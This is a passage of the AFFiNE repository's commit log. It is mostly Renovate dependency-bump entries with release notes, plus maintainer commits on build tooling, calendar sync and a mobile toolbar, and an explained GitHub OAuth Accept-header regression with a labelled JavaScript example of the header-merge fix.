(actions/attest-build-provenance)</summary>

### [`v4`](https://redirect.github.com/actions/attest-build-provenance/compare/v3...v4)

[Compare
Source](https://redirect.github.com/actions/attest-build-provenance/compare/v3...v4)

### [`v3`](https://redirect.github.com/actions/attest-build-provenance/compare/v2...v3)

[Compare
Source](https://redirect.github.com/actions/attest-build-provenance/compare/v2...v3)

</details>

---

### Configuration

📅 **Schedule**: Branch creation - At any time (no schedule defined),
Automerge - At any time (no schedule defined).

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).

Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2026-03-02 10:44:37 +08:00
renovate[bot] 2b6146727b chore: bump up RevenueCat/purchases-ios-spm version to from: "5.60.0" (#14545) 2026-03-02 08:48:25 +08:00
renovate[bot] d5245a3273 chore: bump up Recouse/EventSource version to from: "0.1.7" (#14541)
This PR contains the following updates:

| Package | Update | Change |
|---|---|---|
| [Recouse/EventSource](https://redirect.github.com/Recouse/EventSource) | patch | `from: "0.1.5"` → `from: "0.1.7"` |

---

### Release Notes

<details>
<summary>Recouse/EventSource (Recouse/EventSource)</summary>

### [`v0.1.7`](https://redirect.github.com/Recouse/EventSource/releases/tag/0.1.7)

[Compare
Source](https://redirect.github.com/Recouse/EventSource/compare/0.1.6...0.1.7)

#### What's Changed

- Separate timeout interval values for request and resource by
[@Recouse](https://redirect.github.com/Recouse) in
[#46](https://redirect.github.com/Recouse/EventSource/pull/46)

**Full Changelog**:
<https://github.com/Recouse/EventSource/compare/0.1.6...0.1.7>

### [`v0.1.6`](https://redirect.github.com/Recouse/EventSource/releases/tag/0.1.6)

[Compare
Source](https://redirect.github.com/Recouse/EventSource/compare/0.1.5...0.1.6)

#### What's Changed

- Fix visionOS availability error for split(by:) method by
[@danielseidl](https://redirect.github.com/danielseidl) in
[#45](https://redirect.github.com/Recouse/EventSource/pull/45)

#### New Contributors

- [@danielseidl](https://redirect.github.com/danielseidl) made
their first contribution in
[#45](https://redirect.github.com/Recouse/EventSource/pull/45)

**Full Changelog**:
<https://github.com/Recouse/EventSource/compare/0.1.5...0.1.6>

</details>

---

### Configuration

📅 **Schedule**: Branch creation - At any time (no schedule defined),
Automerge - At any time (no schedule defined).

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).

Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2026-03-02 06:26:20 +08:00
renovate[bot] fff63562b1 chore: bump up Lakr233/MarkdownView version to from: "3.6.3" (#14540)
This PR contains the following updates:

| Package | Update | Change |
|---|---|---|
| [Lakr233/MarkdownView](https://redirect.github.com/Lakr233/MarkdownView) | patch | `from: "3.6.2"` → `from: "3.6.3"` |

---

### Release Notes

<details>
<summary>Lakr233/MarkdownView (Lakr233/MarkdownView)</summary>

### [`v3.6.3`](https://redirect.github.com/Lakr233/MarkdownView/compare/3.6.2...3.6.3)

[Compare
Source](https://redirect.github.com/Lakr233/MarkdownView/compare/3.6.2...3.6.3)

</details>

---

### Configuration

📅 **Schedule**: Branch creation - At any time (no schedule defined),
Automerge - At any time (no schedule defined).

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).

Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2026-03-02 06:26:03 +08:00
renovate[bot] 4136abdd97 chore: bump up rustc version to v1.93.1 (#14542)
This PR contains the following updates:

| Package | Update | Change |
|---|---|---|
| [rustc](https://redirect.github.com/rust-lang/rust) | patch | `1.93.0` → `1.93.1` |

---

### Release Notes

<details>
<summary>rust-lang/rust (rustc)</summary>

### [`v1.93.1`](https://redirect.github.com/rust-lang/rust/blob/HEAD/RELEASES.md#Version-1931-2026-02-12)

[Compare
Source](https://redirect.github.com/rust-lang/rust/compare/1.93.0...1.93.1)

<a id="1.93.1"></a>

- [Don't try to recover keyword as non-keyword
identifier](https://redirect.github.com/rust-lang/rust/pull/150590),
fixing an ICE that especially [affected
rustfmt](https://redirect.github.com/rust-lang/rustfmt/issues/6739).
- [Fix `clippy::panicking_unwrap` false-positive on field access with
implicit
deref](https://redirect.github.com/rust-lang/rust-clippy/pull/16196).
- [Revert "Update wasm-related dependencies in
CI"](https://redirect.github.com/rust-lang/rust/pull/152259), fixing
file descriptor leaks on the `wasm32-wasip2` target.

</details>

---

### Configuration

📅 **Schedule**: Branch creation - At any time (no schedule defined),
Automerge - At any time (no schedule defined).

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).

Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2026-03-02 06:25:51 +08:00
renovate[bot] e249e2e884 chore: bump up opentelemetry (#14543)
This PR contains the following updates:

| Package | Change | [Age](https://docs.renovatebot.com/merge-confidence/) | [Confidence](https://docs.renovatebot.com/merge-confidence/) |
|---|---|---|---|
| [@opentelemetry/exporter-prometheus](https://redirect.github.com/open-telemetry/opentelemetry-js/tree/main/experimental/packages/opentelemetry-exporter-prometheus) ([source](https://redirect.github.com/open-telemetry/opentelemetry-js)) | [`^0.211.0` → `^0.212.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2fexporter-prometheus/0.211.0/0.212.0) | ![age](https://developer.mend.io/api/mc/badges/age/npm/@opentelemetry%2fexporter-prometheus/0.212.0?slim=true) | ![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@opentelemetry%2fexporter-prometheus/0.211.0/0.212.0?slim=true) |
| [@opentelemetry/exporter-zipkin](https://redirect.github.com/open-telemetry/opentelemetry-js/tree/main/packages/opentelemetry-exporter-zipkin) ([source](https://redirect.github.com/open-telemetry/opentelemetry-js)) | [`2.5.0` → `2.5.1`](https://renovatebot.com/diffs/npm/@opentelemetry%2fexporter-zipkin/2.5.0/2.5.1) | ![age](https://developer.mend.io/api/mc/badges/age/npm/@opentelemetry%2fexporter-zipkin/2.5.1?slim=true) | ![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@opentelemetry%2fexporter-zipkin/2.5.0/2.5.1?slim=true) |
| [@opentelemetry/host-metrics](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/tree/main/packages/host-metrics#readme) ([source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/tree/HEAD/packages/host-metrics)) | [`0.38.2` → `0.38.3`](https://renovatebot.com/diffs/npm/@opentelemetry%2fhost-metrics/0.38.2/0.38.3) | ![age](https://developer.mend.io/api/mc/badges/age/npm/@opentelemetry%2fhost-metrics/0.38.3?slim=true) | ![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@opentelemetry%2fhost-metrics/0.38.2/0.38.3?slim=true) |
| [@opentelemetry/instrumentation](https://redirect.github.com/open-telemetry/opentelemetry-js/tree/main/experimental/packages/opentelemetry-instrumentation) ([source](https://redirect.github.com/open-telemetry/opentelemetry-js)) | [`^0.211.0` → `^0.212.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2finstrumentation/0.211.0/0.212.0) | ![age](https://developer.mend.io/api/mc/badges/age/npm/@opentelemetry%2finstrumentation/0.212.0?slim=true) | ![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@opentelemetry%2finstrumentation/0.211.0/0.212.0?slim=true) |
| [@opentelemetry/instrumentation-graphql](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/tree/main/packages/instrumentation-graphql#readme) ([source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/tree/HEAD/packages/instrumentation-graphql)) | [`^0.58.0` → `^0.60.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2finstrumentation-graphql/0.58.0/0.60.0) | ![age](https://developer.mend.io/api/mc/badges/age/npm/@opentelemetry%2finstrumentation-graphql/0.60.0?slim=true) | ![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@opentelemetry%2finstrumentation-graphql/0.58.0/0.60.0?slim=true) |
| [@opentelemetry/instrumentation-http](https://redirect.github.com/open-telemetry/opentelemetry-js/tree/main/experimental/packages/opentelemetry-instrumentation-http) ([source](https://redirect.github.com/open-telemetry/opentelemetry-js)) | [`^0.211.0` → `^0.212.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2finstrumentation-http/0.211.0/0.212.0) | ![age](https://developer.mend.io/api/mc/badges/age/npm/@opentelemetry%2finstrumentation-http/0.212.0?slim=true) | ![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@opentelemetry%2finstrumentation-http/0.211.0/0.212.0?slim=true) |
| [@opentelemetry/instrumentation-ioredis](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/tree/main/packages/instrumentation-ioredis#readme) ([source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/tree/HEAD/packages/instrumentation-ioredis)) | [`^0.59.0` → `^0.60.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2finstrumentation-ioredis/0.59.0/0.60.0) | ![age](https://developer.mend.io/api/mc/badges/age/npm/@opentelemetry%2finstrumentation-ioredis/0.60.0?slim=true) | ![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@opentelemetry%2finstrumentation-ioredis/0.59.0/0.60.0?slim=true) |
| [@opentelemetry/instrumentation-nestjs-core](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/tree/main/packages/instrumentation-nestjs-core#readme) ([source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/tree/HEAD/packages/instrumentation-nestjs-core)) | [`^0.57.0` → `^0.58.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2finstrumentation-nestjs-core/0.57.0/0.58.0) | ![age](https://developer.mend.io/api/mc/badges/age/npm/@opentelemetry%2finstrumentation-nestjs-core/0.58.0?slim=true) | ![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@opentelemetry%2finstrumentation-nestjs-core/0.57.0/0.58.0?slim=true) |
| [@opentelemetry/instrumentation-socket.io](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/tree/main/packages/instrumentation-socket.io#readme) ([source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/tree/HEAD/packages/instrumentation-socket.io)) | [`^0.57.0` → `^0.59.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2finstrumentation-socket.io/0.57.0/0.59.0) | ![age](https://developer.mend.io/api/mc/badges/age/npm/@opentelemetry%2finstrumentation-socket.io/0.59.0?slim=true) | ![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@opentelemetry%2finstrumentation-socket.io/0.57.0/0.59.0?slim=true) |
| [@opentelemetry/sdk-metrics](https://redirect.github.com/open-telemetry/opentelemetry-js/tree/main/packages/sdk-metrics) ([source](https://redirect.github.com/open-telemetry/opentelemetry-js)) | [`2.5.0` → `2.5.1`](https://renovatebot.com/diffs/npm/@opentelemetry%2fsdk-metrics/2.5.0/2.5.1) | ![age](https://developer.mend.io/api/mc/badges/age/npm/@opentelemetry%2fsdk-metrics/2.5.1?slim=true) | ![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@opentelemetry%2fsdk-metrics/2.5.0/2.5.1?slim=true) |
| [@opentelemetry/sdk-node](https://redirect.github.com/open-telemetry/opentelemetry-js/tree/main/experimental/packages/opentelemetry-sdk-node) ([source](https://redirect.github.com/open-telemetry/opentelemetry-js)) | [`^0.211.0` → `^0.212.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2fsdk-node/0.211.0/0.212.0) | ![age](https://developer.mend.io/api/mc/badges/age/npm/@opentelemetry%2fsdk-node/0.212.0?slim=true) | ![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@opentelemetry%2fsdk-node/0.211.0/0.212.0?slim=true) |
| [@opentelemetry/sdk-trace-node](https://redirect.github.com/open-telemetry/opentelemetry-js/tree/main/packages/opentelemetry-sdk-trace-node) ([source](https://redirect.github.com/open-telemetry/opentelemetry-js)) | [`2.5.0` → `2.5.1`](https://renovatebot.com/diffs/npm/@opentelemetry%2fsdk-trace-node/2.5.0/2.5.1) | ![age](https://developer.mend.io/api/mc/badges/age/npm/@opentelemetry%2fsdk-trace-node/2.5.1?slim=true) | ![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@opentelemetry%2fsdk-trace-node/2.5.0/2.5.1?slim=true) |

---

### Release Notes

<details>
<summary>open-telemetry/opentelemetry-js
(@opentelemetry/exporter-prometheus)</summary>

###
[`v0.212.0`](https://redirect.github.com/open-telemetry/opentelemetry-js/compare/38924cbff2a6e924ce8a2a227d3a72de52fbcd35...ad92be4c2c1094745a85b0b7eeff1444a11b1b4a)

[Compare
Source](https://redirect.github.com/open-telemetry/opentelemetry-js/compare/38924cbff2a6e924ce8a2a227d3a72de52fbcd35...ad92be4c2c1094745a85b0b7eeff1444a11b1b4a)

</details>

<details>
<summary>open-telemetry/opentelemetry-js-contrib
(@opentelemetry/host-metrics)</summary>

###
[`v0.38.3`](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/blob/HEAD/packages/host-metrics/CHANGELOG.md#0383-2026-02-25)

[Compare
Source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/compare/7a5f3c0a09b6a2d32c712b2962b95137c906a016...630937db1575c652201558467ae5c449075f0881)

##### Bug Fixes

- **instrumentation-host-metrics:** unpin and update to
systeminformation@^5.31.1
([#3392](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/3392))
([e4ffdb4](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/commit/e4ffdb43d160ace57420978da9c1855be653abe1))

</details>

<details>
<summary>open-telemetry/opentelemetry-js-contrib
(@opentelemetry/instrumentation-graphql)</summary>

###
[`v0.60.0`](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/blob/HEAD/packages/instrumentation-graphql/CHANGELOG.md#0600-2026-02-25)

[Compare
Source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/compare/0b33a118f289c0435a241c84c3c3923312fc2b98...630937db1575c652201558467ae5c449075f0881)

##### Features

- **instrumentation-graphql:** add parent name in attributes of resolver
span
([#3287](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/3287))
([ea2a90a](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/commit/ea2a90a87b5b5a6d29f980a73e61cefa020ab81c))

###
[`v0.59.0`](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/blob/HEAD/packages/instrumentation-graphql/CHANGELOG.md#0590-2026-02-16)

[Compare
Source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/compare/7a5f3c0a09b6a2d32c712b2962b95137c906a016...0b33a118f289c0435a241c84c3c3923312fc2b98)

##### Features

- **deps:** update deps matching "@opentelemetry/\*"
([#3383](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/3383))
([d3ac785](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/commit/d3ac7851d69d0781c2c631012937a73998b744e1))

</details>

<details>
<summary>open-telemetry/opentelemetry-js-contrib
(@opentelemetry/instrumentation-ioredis)</summary>

###
[`v0.60.0`](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/blob/HEAD/packages/instrumentation-ioredis/CHANGELOG.md#0600-2026-02-16)

[Compare
Source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/compare/7a5f3c0a09b6a2d32c712b2962b95137c906a016...0b33a118f289c0435a241c84c3c3923312fc2b98)

##### Features

- **deps:** update deps matching "@opentelemetry/\*"
([#3383](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/3383))
([d3ac785](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/commit/d3ac7851d69d0781c2c631012937a73998b744e1))

##### Dependencies

- The following workspace dependencies were updated
  - devDependencies
-
[@opentelemetry/contrib-test-utils](https://redirect.github.com/opentelemetry/contrib-test-utils)
bumped from ^0.58.0 to ^0.59.0

</details>

<details>
<summary>open-telemetry/opentelemetry-js-contrib
(@opentelemetry/instrumentation-nestjs-core)</summary>

###
[`v0.58.0`](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/blob/HEAD/packages/instrumentation-nestjs-core/CHANGELOG.md#0580-2026-02-16)

[Compare
Source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/compare/7a5f3c0a09b6a2d32c712b2962b95137c906a016...0b33a118f289c0435a241c84c3c3923312fc2b98)

##### Features

- **deps:** update deps matching "@opentelemetry/\*"
([#3383](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/3383))
([d3ac785](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/commit/d3ac7851d69d0781c2c631012937a73998b744e1))

</details>

<details>
<summary>open-telemetry/opentelemetry-js-contrib
(@opentelemetry/instrumentation-socket.io)</summary>

###
[`v0.59.0`](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/blob/HEAD/packages/instrumentation-socket.io/CHANGELOG.md#0590-2026-02-25)

[Compare
Source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/compare/0b33a118f289c0435a241c84c3c3923312fc2b98...630937db1575c652201558467ae5c449075f0881)

##### Features

- **deps:** lock file maintenance
([#3261](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/3261))
([540926b](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/commit/540926bffe713c591163abaf56fbb0e18aaf5b88))

###
[`v0.58.0`](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/blob/HEAD/packages/instrumentation-socket.io/CHANGELOG.md#0580-2026-02-16)

[Compare
Source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/compare/7a5f3c0a09b6a2d32c712b2962b95137c906a016...0b33a118f289c0435a241c84c3c3923312fc2b98)

##### Features

- **deps:** update deps matching "@opentelemetry/\*"
([#3383](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/3383))
([d3ac785](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/commit/d3ac7851d69d0781c2c631012937a73998b744e1))

##### Dependencies

- The following workspace dependencies were updated
  - devDependencies
-
[@opentelemetry/contrib-test-utils](https://redirect.github.com/opentelemetry/contrib-test-utils)
bumped from ^0.58.0 to ^0.59.0

</details>

---

### Configuration

📅 **Schedule**: Branch creation - At any time (no schedule defined),
Automerge - At any time (no schedule defined).

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

👻 **Immortal**: This PR will be recreated if closed unmerged. Get
[config
help](https://redirect.github.com/renovatebot/renovate/discussions) if
that's undesired.

---


This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).


Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2026-03-01 21:19:09 +00:00
GyeongSu Han 2e95d91093 fix: restore Accept header and prevent encoded response in GitHub OAuth token request (regression from #14061) (#14538)
## 📝 Summary

This PR fixes a regression that caused the following error during GitHub
OAuth login:

> Unable to parse JSON response from
[https://github.com/login/oauth/access_token](https://github.com/login/oauth/access_token)

Related issue:
[https://github.com/toeverything/AFFiNE/issues/14334](https://github.com/toeverything/AFFiNE/issues/14334)
Regression introduced in:
[https://github.com/toeverything/AFFiNE/pull/14061](https://github.com/toeverything/AFFiNE/pull/14061)

---

## 🎯 Background

GitHub’s OAuth access token endpoint returns different response formats
depending on the request headers.

To receive a JSON response, the request must include:

```
Accept: application/json
```

If the `Accept` header is missing, GitHub responds with:

```
application/x-www-form-urlencoded
```

The current implementation assumes a JSON response and parses it
directly.
When a non-JSON response is returned, JSON parsing fails,
breaking the OAuth login flow.

---

## 🔍 Traffic Analysis (tcpdump)

Network path:

affine-graphql → (HTTPS) → envoy → (HTTP, tcpdump) → envoy → GitHub

### Observed Request

```
POST /login/oauth/access_token HTTP/1.1
host: github-proxy.com
content-type: application/x-www-form-urlencoded
accept: */*
...
```

### Observed Response

```
HTTP/1.1 200 OK
date: Sat, 28 Feb 2026 14:47:43 GMT
content-type: application/x-www-form-urlencoded; charset=utf-8
...
```

The `Accept` header was `*/*` instead of `application/json`,
causing GitHub to return a form-urlencoded response.

---

## 🐛 Root Cause

PR #14061 introduced a side effect in the request configuration.

Although the `Accept` header was initially defined,
the request options were later overwritten by the `init` parameter.

Because `init.headers` replaced the previously defined headers object,
the required header was lost.

Resulting in:

* Missing `Accept: application/json`
* GitHub returning `application/x-www-form-urlencoded`
* JSON parsing failure
* OAuth login failure

---

## 🔧 Changes

### 1️⃣ Fix header overwrite order

* Process the incoming `init` parameter first
* Explicitly overwrite required headers afterward
* Ensure `Accept: application/json` is always enforced

---

## 💥 Breaking Changes

None.

---

## 🧪 How to Test

1. Configure GitHub OAuth.
2. Attempt login via GitHub.
3. Verify that:

   * The request contains `Accept: application/json`
   * The response content-type is `application/json`
   * No JSON parsing error occurs
   * OAuth login completes successfully

---

## 📌 Notes

This change restores correct OAuth behavior and prevents regression
caused by header overwriting introduced in #14061.

The same header overwrite pattern identified in this issue
was also found in the calendar module and has been corrected there as
well.

## Summary by CodeRabbit

* **Refactor**
* Improved backend HTTP header handling for external integrations to
avoid unintended header overrides, ensuring content-type and encoding
hints are applied consistently and improving reliability of service
requests.

---------

Co-authored-by: coderabbitai[bot] <136622811+coderabbitai[bot]@users.noreply.github.com>
2026-03-01 14:32:28 +00:00
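
The header overwrite described under Root Cause in the commit above, as an added example that is not AFFiNE's code: the function names, the `X-Trace` header, the stand-in endpoint and the token value are all constructed for illustration. It shows the "defaults first, `init` spread last" merge losing `Accept`, the corrected order, and a parser that rejects a non-JSON token response instead of failing inside `JSON.parse`.

```javascript
// Added example; hypothetical helpers, runs on Node 18+ (global Headers).
const REQUIRED_HEADERS = { Accept: 'application/json' };
const FORM = 'application/x-www-form-urlencoded';

// "Before" shape: defaults are defined, then the caller's init is spread
// over them. If init carries its own headers object, it replaces the whole
// defaults object and the Accept header disappears.
function buildOptionsOverwritten(init = {}) {
  return {
    method: 'POST',
    headers: { ...REQUIRED_HEADERS, 'Content-Type': FORM },
    ...init,
  };
}

// "After" shape: take the caller's init first, then set the required
// headers last so they cannot be dropped or overridden.
function buildOptionsEnforced(init = {}) {
  const headers = new Headers(init.headers);
  if (!headers.has('content-type')) headers.set('Content-Type', FORM);
  for (const [name, value] of Object.entries(REQUIRED_HEADERS)) {
    headers.set(name, value);
  }
  return { method: 'POST', ...init, headers };
}

// Case-insensitive lookup of the Accept header on either option shape.
function acceptOf(options) {
  return new Headers(options.headers).get('accept');
}

// Constructed stand-in for the content negotiation the commit describes:
// JSON only when the request asks for it, form-urlencoded otherwise.
function fakeTokenEndpoint(options) {
  const accept = acceptOf(options) ?? '*/*';
  if (accept.includes('application/json')) {
    return {
      contentType: 'application/json; charset=utf-8',
      body: JSON.stringify({ access_token: 'constructed-token', token_type: 'bearer' }),
    };
  }
  return {
    contentType: `${FORM}; charset=utf-8`,
    body: 'access_token=constructed-token&token_type=bearer',
  };
}

// Check the media type before parsing, so an unexpected format surfaces as
// a clear error rather than as a JSON syntax error deep in the login flow.
function parseTokenResponse(response) {
  const mediaType = response.contentType.split(';')[0].trim().toLowerCase();
  if (mediaType !== 'application/json') {
    throw new Error(`unexpected token response content-type: ${mediaType}`);
  }
  return JSON.parse(response.body);
}

// Runs the exchange with one builder and reports what happened.
function exchange(buildOptions, init) {
  const options = buildOptions(init);
  try {
    return { accept: acceptOf(options), token: parseTokenResponse(fakeTokenEndpoint(options)) };
  } catch (err) {
    return { accept: acceptOf(options), error: err.message };
  }
}

const callerInit = { headers: { 'X-Trace': '1' } }; // constructed caller input
console.log(exchange(buildOptionsOverwritten, callerInit));
console.log(exchange(buildOptionsEnforced, callerInit));
```
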
DarkSky 2cb171f553 feat: cleanup webpack deps (#14530)
#### PR Dependency Tree


* **PR #14530** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)

## Summary by CodeRabbit

* **Breaking Changes**
  * Webpack bundler support removed from the build system
* Bundler selection parameter removed from build and development
commands

* **Refactor**
  * Build configuration consolidated to a single bundler approach
* Webpack-specific build paths and workflows removed; development server
simplified

* **Chores**
  * Removed webpack-related dev dependencies and tooling
  * Updated package build scripts for a unified bundle command

* **Dependencies**
* Upgraded Sentry packages across frontend packages
(react/electron/esbuild plugin)
2026-02-28 00:24:08 +08:00
DarkSky a4e2242b8d chore: bump playwright (#13947)
## Summary by CodeRabbit

* **Chores**
* Updated Playwright test tooling to 1.58.2 across the repository and
test packages.

* **Tests**
* Improved end-to-end robustness: replaced fragile timing/coordinate
logic with element-based interactions, added polling/retry checks for
flaky asserts and async state, and simplified input/rename flows to
reduce test flakiness.
2026-02-27 22:56:43 +08:00
DarkSky c90f173821 chore: bump deps (#14526)
#### PR Dependency Tree


* **PR #14526** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)


## Summary by CodeRabbit

* **Chores**
* Updated Storybook component development tooling to version 10.2.13 for
improved stability and performance
  * Removed Chromatic integration from the component preview system

2026-02-27 20:17:06 +08:00
DarkSky e1e0ac2345 chore: cleanup deps (#14525)
#### PR Dependency Tree


* **PR #14525** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)

## Summary by CodeRabbit

* **Chores**
  * Removed an unused development dependency.
* Updated dotLottie/Lottie-related dependency versions across packages
and replaced a removed player dependency with the new package.

* **Refactor**
* AI animated icons now re-export from a shared component and are loaded
only in the browser, reducing upfront bundle weight and centralizing
icon assets.
2026-02-27 11:56:54 +08:00
DarkSky bdccf4e9fd fix: typo 2026-02-27 10:20:35 +08:00
DarkSky 11cf1928b5 fix(server): transaction error (#14518)
## Summary by CodeRabbit

* **New Features**
* Events can be dispatched in a detached context to avoid inheriting the
current transaction.

* **Bug Fixes**
* Improved resilience and error handling for event processing (graceful
handling of deleted workspaces and ignorable DB errors).
  * More reliable owner assignment flow when changing document owners.

* **Tests**
  * Added tests for doc content staleness with deleted workspaces.
  * Added permission event tests for missing workspace/editor scenarios.
2026-02-26 19:53:22 +08:00
donqu1xotevincent 5215c73166 chore(ios): update description (#14522) 2026-02-26 19:49:50 +08:00
DarkSky 895e774569 fix: static file handle & ws connect 2026-02-25 11:41:42 +08:00
DarkSky 79460072bb fix: old client compatibility 2026-02-24 23:58:10 +08:00
DarkSky 41b3b0e82e feat: handle calendar sync failed (#14510)
#### PR Dependency Tree


* **PR #14510** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)

## Summary by CodeRabbit

* **Bug Fixes**
* Improved calendar sync reliability with exponential backoff for
repeated failures.
* Better handling of token refresh failures with automatic account
invalidation and cleanup when needed.
* Subscriptions are now automatically disabled and related events
removed when the calendar provider reports missing resources.

* **Tests**
* Added comprehensive tests covering sync failures, backoff behavior,
token refresh handling, skipping retries during backoff, and recovery.
2026-02-24 22:45:47 +08:00
DarkSky 9c99293c92 fix: linux release 2026-02-24 19:46:11 +08:00
DarkSky 6aba4350ac fix: deps link 2026-02-24 18:09:57 +08:00
DarkSky 046e126054 feat: bump typescript (#14507)
## Summary by CodeRabbit

* **Chores**
  * Upgraded TypeScript toolchain to v5.9.3 across packages and tooling.
* Removed legacy ts-node and migrated developer tooling to newer
runtimes (tsx/SWC) where applicable.
* **Documentation**
* Updated developer CLI docs and runtime behavior notes to reflect the
new loader/runtime for running TypeScript files; no changes to public
APIs or end-user behavior.
2026-02-24 13:22:46 +08:00
DarkSky c2c7dde06c chore: bump deps (#14506)
## Summary by CodeRabbit

* **Chores**
  * Version bumped to 0.26.3 across the project and Helm charts.
  * Removed an unused dependency (minimatch) from multiple packages.
* Updated build/tooling and packaging metadata, including packaging
maker replacement.
  * Adjusted app release metadata and platform packaging config.

* **Tests**
* Updated test snapshots to reflect minor presentational styling
adjustments.
2026-02-24 09:11:41 +08:00
DarkSky 5fb1c11a96 fix: image proxy url (#14505)
#### PR Dependency Tree


* **PR #14505** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)

## Summary by CodeRabbit

* **Improvements**
* Better image-proxy detection to avoid double-proxying already proxied
images.
* Improved runtime image proxy configuration so images load consistently
across deployments.
* More robust image URL handling for optimized image loading and fewer
redundant requests.
2026-02-24 03:29:17 +08:00
passabilities.eth 3e39dbb298 fix(mobile): fixed toolbar position (#14329)
## Summary
Fixed the text formatting toolbar not working properly on mobile web
browsers.

## Problem
The toolbar had multiple issues on mobile devices:
- It would render off-screen or be covered by the virtual keyboard
- The flag-based rendering system caused visibility issues on mobile
- Long-press text selection didn't trigger the toolbar
